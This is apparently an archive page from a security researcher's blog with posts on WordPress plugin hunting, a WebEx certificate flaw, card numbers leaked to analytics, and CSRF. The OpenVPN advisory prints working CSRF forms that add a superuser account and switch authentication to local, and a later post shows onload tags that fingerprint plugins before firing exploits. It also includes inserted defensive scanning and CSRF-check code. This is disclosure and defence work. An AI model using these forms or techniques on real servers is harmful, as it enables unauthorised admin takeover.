                    .find('p', {'class': 'button'}).a['href']
                filename = os.path.basename(urlsplit(downloadLink)[2])
                # os.path.join so a folder given without a trailing slash still works
                urllib.urlretrieve(downloadLink, os.path.join(args.output, filename))
                print "Downloaded %s" % filename

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--downloads", help="Minimum number of plugin downloads", default=100000, type=int)
    # Default to the current directory; an empty default made os.makedirs("") fail
    parser.add_argument("-o", "--output", help="Output folder", default=".", type=str)
    parser.add_argument("-p", "--pages", help="Number of pages to parse", default=250, type=int)
    args = parser.parse_args()
    main(args)
</code></pre>
<p>Thanks to the team behind BSides RI for giving me the chance to present my technique and research used for finding these vulnerabilities. I’d encourage anybody to not only go to a BSides near you, but also have a go at finding vulnerabilities in WordPress plugins. It’s a ton of fun!</p>
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/wordpress/" rel="tag">Wordpress</a>, <a href="https://charlieeriksen.github.io/tag/wordpress-plugins/" rel="tag">Wordpress Plugins</a> </span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-276 -->
<article id="post-268" class="post-268 post type-post status-publish format-standard hentry category-advisories tag-cisco">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/05/24/cve-2012-6399-or-how-your-cisco-webex-meetings-arent-very-confidential-on-ios/" title="4:19 pm" rel="bookmark" class="entry-date"><time datetime="2013-05-24T16:19:42+00:00" pubdate>May 24, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/24/cve-2012-6399-or-how-your-cisco-webex-meetings-arent-very-confidential-on-ios/" title="Permalink to CVE-2012-6399 – Or how your Cisco WebEx meetings aren’t very confidential on iOS" rel="bookmark">CVE-2012-6399 – Or how your Cisco WebEx meetings aren’t very confidential on iOS</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p><strong>Advisory</strong></p>
<p><a href=" http://secunia.com/advisories/51412/">Secunia SA 51412</a></p>
<p><strong>Information</strong></p>
<p>By default, when creating a connection using iOS you will get a nice helpful warning if you stumble upon a certificate chain that can’t be verified:</p>
<div id="attachment_269" style="width: 231px" class="wp-caption alignnone"><a href="http://www.dhanjani.com/blog/2010/12/intercepting-ssl-connections-on-ios-and-secure-coding-against-mitm.html"><img class="size-full wp-image-269 " alt="iOS Certificate Warning" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/ioscertwarning.png" width="221" height="430" /></a><p class="wp-caption-text">Source: <a href="http://www.dhanjani.com/blog/2010/12/intercepting-ssl-connections-on-ios-and-secure-coding-against-mitm.html">http://www.dhanjani.com</a><br />Contains other great information about the subject as well.</p></div>
<p>However, some applications <a href="http://www.dhanjani.com/blog/2010/12/intercepting-ssl-connections-on-ios-and-secure-coding-against-mitm.html">override this functionality</a>. In this case, an unfixed vulnerability submitted through <a href="http://secunia.com/community/research/svcrp/">Secunia SVCRP</a> reached its 6-month limit as per <a href="http://secunia.com/community/research/policy/">Secunia’s disclosure policy</a>. This means that a MITM can replace the certificate on the connection and decrypt the traffic without the user knowing, leading to a loss of confidentiality.</p>
<p>It’s also interesting to note that when you authenticate with the WebEx service, as you can see in the Burp screenshot below, it submits your credentials to not just one but two WebEx servers: one in the USA, and one in Beijing, China. You’ve got to wonder what the purpose of that is, though I won’t speculate about it:</p>
<div id="attachment_270" style="width: 1105px" class="wp-caption alignnone"><a href="https://charlieeriksen.github.io/wp-content/uploads/2013/05/webexchina.png"><img class="size-full wp-image-270" alt="WebEx submitting your credentials to China" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/webexchina.png" width="1095" height="525" /></a><p class="wp-caption-text">WebEx submitting your credentials to China</p></div>
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/cisco/" rel="tag">Cisco</a> </span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-268 -->
<article id="post-263" class="post-263 post type-post status-publish format-standard hentry category-privacy">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/05/16/credit-card-numbers-third-parties-and-you/" title="10:35 am" rel="bookmark" class="entry-date"><time datetime="2013-05-16T10:35:45+00:00" pubdate>May 16, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/16/credit-card-numbers-third-parties-and-you/" title="Permalink to Credit card numbers, third parties and you" rel="bookmark">Credit card numbers, third parties and you</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<div>
<p>One part of the preparation for my upcoming talk at BSides RI involved shuffling some cash from my bank account to make it available on my credit card. While in this process, something struck me as rather odd, as seen on the following Burp output:</p>
</div>
<div id="attachment_264" style="width: 917px" class="wp-caption alignnone"><a href="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request1.png"><img class="size-full wp-image-264" alt="Request containing credit card number" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request1.png" width="907" height="148" /></a><p class="wp-caption-text">Request containing credit card number</p></div>
<p>As we can see, the URL query string contains a parameter identified as “KortNo”, and this just so happens to contain my actual credit card number. So the question becomes: is this a big deal? Looking at it from a PCI perspective, I think there may be some cause for concern.</p>
<h1>Access logs, browser history</h1>
<p>It’s of course common practice for companies to keep access logs for all HTTP servers, so that they are available for forensic purposes in the event of a system breach. PCI has a mandate for companies to retain at least 1 year’s worth of “logs”. Because PCI mandates that logs are kept, you are 99% likely as a bank to keep your HTTP logs, including the URL requested. In this instance, we make a request with data whose storage PCI has a strong view upon, including the very explicit requirement of encrypting the PAN (primary account number), CVV2, expiration date, and any other personally identifiable information if you store the former three.</p>
<p>So what happens when you make an HTTP GET request containing data which PCI mandates the encryption of, and it goes into a standard IIS log? Well, you are storing data in violation of PCI compliance. Anyone who gets their hands on the access logs from the server now has access to a lot of credit card data. This is rather unfortunate.</p>
<p>Even more likely is that your personal browser history will now contain your credit card number and hang on to it. Of course, this requires some social engineering to be relevant. However, if this is not made known to the user, then it is a cause for concern.</p>
<h1>Third parties</h1>
<p>Of course, when you run a web site, you like to track user behavior on your site. Who doesn’t? Banks do, and in this case, the above concerns are amplified when I noticed this request having been made by my browser at the same time:</p>
<div id="attachment_265" style="width: 946px" class="wp-caption alignnone"><a href="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request2.png"><img class="size-full wp-image-265" alt="Request to google analytics" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request2.png" width="936" height="228" /></a><p class="wp-caption-text">Request to google analytics</p></div>
<p>What you see here is a standard Google Analytics callback. We see that our query string, containing data that PCI mandates you must ensure is stored correctly, is now sent off to a third party, Google in this case. OK, we may trust Google, but it also means that anybody with access to the Google Analytics account can now view this credit card data. That means this bank would have to have made an explicit contract with Google to verify that they will safe-keep this PCI data.</p>
<p>Is that likely? Not really. This is just an unfortunate side-effect of the bad practice of using the raw PAN (credit card number) as part of the request in a query string.</p>
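<p>A check a defender can run over the access logs described in the section above and the analytics beacon from this one (an added example, not the bank’s or this post’s code): it parses W3C/IIS-style log lines, percent-decodes every query value and flags Luhn-valid 13–19 digit runs, reporting them only in truncated form. The log lines, paths and parameter names other than <code>KortNo</code> are constructed, and <code>4111111111111111</code> is a well-known test card number.</p>

```ruby
require 'uri'

# Luhn check: a 13-19 digit run that passes it is far more likely to be a PAN than
# an order id, customer number or timestamp, which keeps false positives down.
def luhn_valid?(digits)
  return false unless digits.match?(/\A\d{13,19}\z/)
  sum = 0
  digits.reverse.each_char.with_index do |ch, i|
    d = ch.to_i
    d *= 2 if i.odd?
    d -= 9 if d > 9
    sum += d
  end
  (sum % 10).zero?
end

# Report PANs in PCI's truncated form (first six, last four) so that the scan
# output does not become yet another copy of the full number.
def mask_pan(pan)
  pan[0, 6] + '*' * (pan.length - 10) + pan[-4, 4]
end

# Parse one W3C extended (IIS-style) log record. Field order follows the
# constructed #Fields header in SAMPLE_LOG; comment lines return nil.
def parse_w3c_line(line)
  return nil if line.start_with?('#') || line.strip.empty?
  f = line.split(' ')
  return nil if f.length < 5
  { date: f[0], time: f[1], method: f[2], stem: f[3], query: f[4] == '-' ? '' : f[4] }
end

# Decode the query string and look for Luhn-valid digit runs in every value.
# Percent-decoding matters: the analytics beacon carries the referring page's
# path and query string URL-encoded inside one of its own parameters, so the
# card number reaches the third party without ever being a top-level key.
def pan_findings(query)
  findings = []
  URI.decode_www_form(query).each do |name, value|
    value.scan(/\d{13,19}/) do |run|
      findings << { param: name, pan: mask_pan(run) } if luhn_valid?(run)
    end
  end
  findings
end

# Walk a whole log and attach request path and timestamp to each finding.
def scan_log(text)
  results = []
  text.each_line do |line|
    rec = parse_w3c_line(line)
    next unless rec
    pan_findings(rec[:query]).each do |f|
      results << f.merge(stem: rec[:stem], time: "#{rec[:date]} #{rec[:time]}")
    end
  end
  results
end

# Constructed sample log: 4111111111111111 is a well-known test card number, the
# paths are invented, and KundeNr is a 13-digit id that does not pass Luhn.
SAMPLE_LOG = <<~LOG
  #Software: Microsoft Internet Information Services 7.5
  #Fields: date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
  2013-05-13 09:12:01 GET /kort/overfoer.aspx KortNo=4111111111111111&Beloeb=500&KundeNr=1234567890123 443 - 10.0.0.1 200
  2013-05-13 09:12:02 GET /__utm.gif utmwv=5.4.1&utmp=%2Fkort%2Foverfoer.aspx%3FKortNo%3D4111111111111111%26Beloeb%3D500&utmac=UA-XXXXX-1 443 - 10.0.0.1 200
  2013-05-13 09:12:05 GET /konto/oversigt.aspx KundeNr=1234567890123 443 - 10.0.0.1 200
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |f|
    puts "#{f[:time]} #{f[:stem]} param=#{f[:param]} pan=#{f[:pan]}"
  end
end
```

Run against real logs, the same scan applied to the analytics beacon's decoded parameters is what shows whether a PAN has already left for the third party.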
<h1>Putting it into perspective</h1>
<p>When I discovered this, I rushed over to my other bank account (with a different bank) to check if a similar problem existed there. I observed that they had made the seemingly explicit design decision of not using the credit card number. Rather, they used a hash and a GUID to identify my credit card. While they were also using a third-party analytics service, the requests did not contain personal information to the extent the above did, which mitigates potential concerns in this regard.</p>
<h1>Timeline</h1>
<ul>
<li>13/05/2013 – Advisory sent to CERT</li>
<li>13/05/2013 – CERT confirms receipt of advisory, promises to provide contact at vendor</li>
<li>14/05/2013 – CERT still searching for appropriate vendor point of contact</li>
<li>15/05/2013 – CERT provides point of contact</li>
<li>15/05/2013 – Advisory sent to vendor</li>
<li>15/05/2013 – Vendor response confirming issue</li>
<li>15/05/2013 – Vendor deploys fix</li>
<li>16/05/2013 – Advisory published</li>
</ul>
<p>It should be noted that the bank in question was quick to respond and fix the privacy concern in a professional manner. I’ve redacted the name of the bank as the goal of this was to highlight a potential pitfall that others may fall into, and hopefully this may encourage other banks to ensure that this is not a concern in their systems as well.</p>
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/privacy/" title="View all posts in Privacy" rel="category tag">Privacy</a> </span>
<span class="sep"> / </span>
<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/16/credit-card-numbers-third-parties-and-you/#respond" title="Comment on Credit card numbers, third parties and you">Leave a comment</a></span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-263 -->
<article id="post-256" class="post-256 post type-post status-publish format-standard hentry category-advisories category-security tag-csrf tag-openvpn">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/05/09/cve-2013-2692-or-when-your-openvpn-is-a-bit-too-open/" title="12:33 am" rel="bookmark" class="entry-date"><time datetime="2013-05-09T00:33:11+00:00" pubdate>May 9, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/09/cve-2013-2692-or-when-your-openvpn-is-a-bit-too-open/" title="Permalink to CVE-2013-2692 – Or when your OpenVPN is a bit too open" rel="bookmark">CVE-2013-2692 – Or when your OpenVPN is a bit too open</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p><strong>Advisories</strong></p>
<p><a href="http://openvpn.net/index.php/access-server/download-openvpn-as/531-release-notes-v185.html">OpenVPN</a></p>
<p><a href="http://secunia.com/advisories/52802">Secunia</a></p>
<p><strong>Details</strong></p>
<p>When analyzing the <a href="http://openvpn.net/index.php/access-server/download-openvpn-as-vm/164.html?osfamily=Virtual%20Appliance%20(VMWare)&ex=1">OpenVPN Access Server</a>, it quickly became apparent that the administration interface lacked any basic level of CSRF protection. This was easily demonstrated with a CSRF form like the following, which adds a new user with admin privileges, using the username “csrfaccount” and password “qweasd”:</p>
<div id="crayon-53c98e7808da5567114753" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
<form action="https://192.168.1.133/admin/user_permissions" method="POST" enctype="multipart/form-data">
<input type="hidden" name="search" value="&#13;" />
<input type="hidden" name="edit&#58;openvpn&#58;conn&#95;group" value="None" />
<input type="hidden" name="edit&#58;openvpn&#58;pvt&#95;password&#95;digest" value="&#13;" />
<input type="hidden" name="edit&#58;openvpn&#58;dynstatic" value="true" />
<input type="hidden" name="edit&#58;openvpn&#58;conn&#95;ip" value="&#13;" />
<input type="hidden" name="edit&#58;openvpn&#58;s2c&#95;route&#95;type" value="nat" />
<input type="hidden" name="edit&#58;openvpn&#58;s2c&#95;routes" value="&#13;" />
<input type="hidden" name="edit&#58;openvpn&#58;gwyesno" value="no" />
<input type="hidden" name="edit&#58;openvpn&#58;c2s&#95;routes" value="&#13;" />
<input type="hidden" name="edit&#58;openvpn&#58;dmzyesno" value="no" />
<input type="hidden" name="edit&#58;openvpn&#58;dmz&#95;ip" value="&#13;" />
<input type="hidden" name="new&#95;username" value="csrfaccount" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;conn&#95;group" value="None" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;prop&#95;superuser" value="true" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;pvt&#95;password&#95;digest" value="qweasd" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;dynstatic" value="true" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;conn&#95;ip" value="&#13;" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;s2c&#95;route&#95;type" value="nat" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;s2c&#95;routes" value="&#13;" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;gwyesno" value="no" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;c2s&#95;routes" value="&#13;" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;dmzyesno" value="no" />
<input type="hidden" name="edit&#58;&#37;NEW&#37;USER&#37;&#58;dmz&#95;ip" value="&#13;" />
<input type="hidden" name="button" value="Save&#32;Settings" />
</form></textarea></div>
</div>
<p>For this to be effective, we need to ensure that the server is configured to use “Local” authentication, meaning OpenVPN itself controls authentication rather than delegating to PAM/RADIUS/LDAP. We can do this with these two simple requests:</p>
<div id="crayon-53c98e7808db3093754557" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
<form action="https://192.168.1.133/admin/authentication_general_configuration" method="POST" enctype="multipart/form-data">
<input type="hidden" name="auth&#46;module&#46;type" value="local" />
<input type="hidden" name="button" value="Save&#32;Settings" />
</form></textarea></div>
</div>
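<p>The forms above work because the handlers trust the session cookie alone. As an added example, not OpenVPN Access Server's code, here is the user-permissions endpoint modelled with and without the two checks a defender would add: an Origin/Referer check and a per-session synchronizer token. The session store, handler names and form handling are hypothetical, the field names follow the PoC form above, and the attacker origin is a placeholder.</p>

```python
# Added example, not OpenVPN's code: the checks the /admin/user_permissions
# handler above lacks. Session store and handler names are hypothetical.
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SERVER_ORIGIN = "https://192.168.1.133"  # origin the admin UI is served from (as in the PoC)
ACTION = "/admin/user_permissions"


class Forbidden(Exception):
    pass


@dataclass
class Session:
    """Server-side session; csrf_secret is minted once per login and never sent to the client."""
    user: str
    is_admin: bool
    csrf_secret: bytes = field(default_factory=lambda: secrets.token_bytes(32))


def csrf_token_for(session: Session, action: str) -> str:
    """Token the server embeds in each form: an HMAC over the action path, so a
    token rendered for one admin page cannot be replayed against another."""
    return hmac.new(session.csrf_secret, action.encode(), hashlib.sha256).hexdigest()


def _apply(form: dict, users: dict) -> None:
    """Create the account the form describes (field names as in the PoC form)."""
    name = form.get("new_username")
    if name:
        users[name] = {"superuser": form.get("edit:%NEW%USER%:prop_superuser") == "true"}


def vulnerable_user_permissions(session: Session, form: dict, users: dict) -> None:
    """The behaviour the post demonstrates: an authenticated session cookie is all
    it takes, so a form on any other site can create an admin user."""
    if not session.is_admin:
        raise Forbidden("admin session required")
    _apply(form, users)


def hardened_user_permissions(session: Session, form: dict, headers: dict, users: dict) -> None:
    """Same handler with two independent checks:
    1. Origin (or, failing that, Referer) must equal the server's own origin;
       browsers attach these to cross-site form posts and page script cannot forge them.
    2. The form must carry the per-session token, compared in constant time.
    The PoC posts multipart/form-data, a 'simple' request that CORS never blocks,
    so nothing short of checks like these stops it."""
    if not session.is_admin:
        raise Forbidden("admin session required")
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        raise Forbidden("cross-site request: no Origin or Referer")
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SERVER_ORIGIN:
        raise Forbidden("cross-site request: foreign Origin/Referer")
    if not hmac.compare_digest(csrf_token_for(session, ACTION), form.get("csrf_token", "")):
        raise Forbidden("missing or invalid CSRF token")
    _apply(form, users)


# Constructed sample: the PoC form's POST as the server sees it. No token, and
# the browser stamps it with the attacker page's origin (placeholder host).
FORGED_FORM = {
    "new_username": "csrfaccount",
    "edit:%NEW%USER%:prop_superuser": "true",
    "edit:%NEW%USER%:pvt_password_digest": "qweasd",
    "button": "Save Settings",
}
FORGED_HEADERS = {"Origin": "https://attacker.example"}


def demo() -> tuple[bool, bool, bool]:
    """Returns (vulnerable handler created the user, hardened handler blocked it,
    hardened handler still accepts a genuine submission from the admin UI)."""
    admin = Session(user="openvpn", is_admin=True)

    users: dict = {}
    vulnerable_user_permissions(admin, FORGED_FORM, users)
    created_by_vulnerable = "csrfaccount" in users

    users = {}
    try:
        hardened_user_permissions(admin, FORGED_FORM, FORGED_HEADERS, users)
        blocked = False
    except Forbidden:
        blocked = "csrfaccount" not in users

    # A genuine submission carries the embedded token and the server's own Origin.
    legit = dict(FORGED_FORM, new_username="alice", csrf_token=csrf_token_for(admin, ACTION))
    hardened_user_permissions(admin, legit, {"Origin": SERVER_ORIGIN}, users)
    return created_by_vulnerable, blocked, users.get("alice", {}).get("superuser") is True


if __name__ == "__main__":
    print(demo())  # (True, True, True)
```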
<p>When we have changed the authentication method, we need to commit the change:</p>
<div id="crayon-53c98e7808dba543754875" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
<form action="https://192.168.1.133/admin/authentication_general_configuration" method="POST" enctype="multipart/form-data">
<input type="hidden" name="button" value="Update&#32;Running&#32;Server" />
<input type="hidden" name="auth&#46;module&#46;type" value="local" />
</form></textarea></div>
</div>
<p>If we deliver these three requests to a target in a CSRF attack (which can be done with the method described in my post about <a title="Two-stage CSRF attacks" href="https://charlieeriksen.github.io/2012/09/29/two-stage-csrf-attacks/">multi-stage CSRF attacks</a>), we can then authenticate to the OpenVPN AS admin interface with the account csrfaccount/qweasd. From there, the server can be taken over.</p>
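<p>As an added example, not part of the original advisory, the Python below shows the two server-side checks that would have stopped the forged requests above: a per-session synchronizer token that a page on another origin cannot read, and an Origin/Referer check against the admin UI's own origin. The admin origin is the one from the advisory; the hidden field name and the third-party origin used in the demo are constructed.</p>

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Origin of the OpenVPN AS admin UI from the advisory; only forms served
# from here may change settings.
ADMIN_ORIGIN = "https://192.168.1.133"
# Hypothetical name of the hidden field that would carry the token.
TOKEN_FIELD = "csrf_token"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create a per-session synchronizer token and remember it server-side.

    The server embeds the value in every legitimate admin form. A page on
    another origin cannot read it, so a forged POST cannot reproduce it.
    """
    token = secrets.token_urlsafe(32)
    session[TOKEN_FIELD] = token
    return token


def request_origin(headers: Dict[str, str]) -> Optional[str]:
    """Return scheme://host[:port] from Origin, else from Referer, else None."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return "%s://%s" % (parts.scheme, parts.netloc)
    return None


def is_state_change_allowed(headers: Dict[str, str],
                            form: Dict[str, str],
                            session: Dict[str, str]) -> Tuple[bool, str]:
    """Gate a POST to an admin endpoint such as
    /admin/authentication_general_configuration.

    Both checks must pass: the browser-reported origin has to be the admin
    UI itself, and the form has to carry the session's token. A request
    with neither Origin nor Referer is treated as cross-site, not trusted.
    """
    origin = request_origin(headers)
    if origin is None:
        return False, "missing Origin and Referer"
    if origin != ADMIN_ORIGIN:
        return False, "cross-site origin %s" % origin

    expected = session.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD, "")
    # Constant-time comparison; a wrong length fails without leaking where.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo() -> bool:
    """Replay the advisory's forged form against the checks.

    The forged request comes with the victim's cookie but from a constructed
    third-party origin and without the token; the genuine one passes both.
    """
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    forged_form = {"auth.module.type": "local", "button": "Save Settings"}
    forged_ok, _ = is_state_change_allowed(
        {"Origin": "http://example.net"}, forged_form, session)
    genuine_ok, _ = is_state_change_allowed(
        {"Origin": ADMIN_ORIGIN}, {**forged_form, TOKEN_FIELD: token}, session)
    return (not forged_ok) and genuine_ok
```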
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a>, <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/csrf/" rel="tag">CSRF</a>, <a href="https://charlieeriksen.github.io/tag/openvpn/" rel="tag">OpenVPN</a> </span>
<span class="sep"> / </span>
<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/09/cve-2013-2692-or-when-your-openvpn-is-a-bit-too-open/#respond" title="Comment on CVE-2013-2692 – Or when your OpenVPN is a bit too open">Leave a comment</a></span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-256 -->
<article id="post-249" class="post-249 post type-post status-publish format-standard hentry category-security tag-csrf">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/05/03/conditional-csrf-or-how-to-spray-without-praying/" title="10:23 pm" rel="bookmark" class="entry-date"><time datetime="2013-05-03T22:23:43+00:00" pubdate>May 3, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/03/conditional-csrf-or-how-to-spray-without-praying/" title="Permalink to Conditional CSRF – Or how to spray without praying" rel="bookmark">Conditional CSRF – Or how to spray without praying</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p>Part of the goal of my latest project, <a title="WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins" href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/" target="_blank">WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins</a>, was to show some novel techniques I've been picking up for exploiting web applications and delivering payloads in neat ways. One goal specifically was to deliver an array of different potential payloads depending on specific conditions, rather than spraying and praying. The most obvious condition is whether or not the target has a specific plugin installed. My approach ended up being a somewhat obscure but neat one that others have documented before: the onload/onerror attributes on HTML elements that pull in outside resources. Let's deconstruct a landing page as you'd see it from the above project:</p>
<div id="crayon-53c98e78094d4884474893" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
<image src="http://192.168.1.116/wordpress/wp-content/plugins/all-in-one-webmaster/images/fail.jpg" width="0" height="0" onload="window.location = '/pi2Y4fcVY7fRHjo';">
<script src="http://192.168.1.116/wordpress/wp-content/plugins/easy-adsense-lite/wz_tooltip.js" onload="window.location = '/105BTlRREjf4E4F';"></script>
<image src="http://192.168.1.116/wordpress/wp-content/plugins/wp-downloadmanager/images/drive.png" width="0" height="0" onload="window.location = '/E36LAz5PgUlSDzt';">
<image src="http://192.168.1.116/wordpress/wp-content/plugins/wp-print/images/print.gif" width="0" height="0" onload="window.location = '/xQEMYQu2lOGPXAf';"></textarea></div>
</div>
<p>What we see here is a set of image and script tags, each pointing at a file that would exist on the remote system if a specific WordPress plugin were installed. If the plugin is not installed on the host, nothing happens. We're not loading them for display, as I'm sure you guessed; rather, we're hoping to get the onload attribute invoked, which contains some convenient JavaScript of ours.</p>
<p>When the vulnerable plugin is detected, we redirect to a page that contains our actual exploit payload. This means we don't have to send all possible payloads at once, but can keep some obscurity until we know we can hit something interesting. In other words, you can spray a target without having to pray that your exploits work, because they won't trigger unless the target has the plugin you're targeting.</p>
<p>This approach is not new: it has been used in the past for things like resolving different host-names, IPs and port ranges on an internal network through a hooked browser, in order to scan for other web applications to target. Here we use it to detect the presence of a vulnerable plugin on a (granted, pre-determined) target. Because we don't have to poke at the running system up front, we get a lower turn-around time on delivering a payload that either hits the target or simply does nothing.</p>
<p>So there you have it. This is probably not a useful approach in every case where you exploit a CSRF vulnerability, but it's still an interesting one, and hopefully it will inspire others to think about being sneakier (don't spray and pray!) in their exploitation attempts and make full use of the wonderful things HTML and JavaScript offer you!</p>
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/csrf/" rel="tag">CSRF</a> </span>
<span class="sep"> / </span>
<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/03/conditional-csrf-or-how-to-spray-without-praying/#comments" title="Comment on Conditional CSRF – Or how to spray without praying">1 Comment</a></span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-249 -->
<article id="post-238" class="post-238 post type-post status-publish format-standard hentry category-security">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/" title="4:03 pm" rel="bookmark" class="entry-date"><time datetime="2013-05-01T16:03:59+00:00" pubdate>May 1, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/" title="Permalink to WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins" rel="bookmark">WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
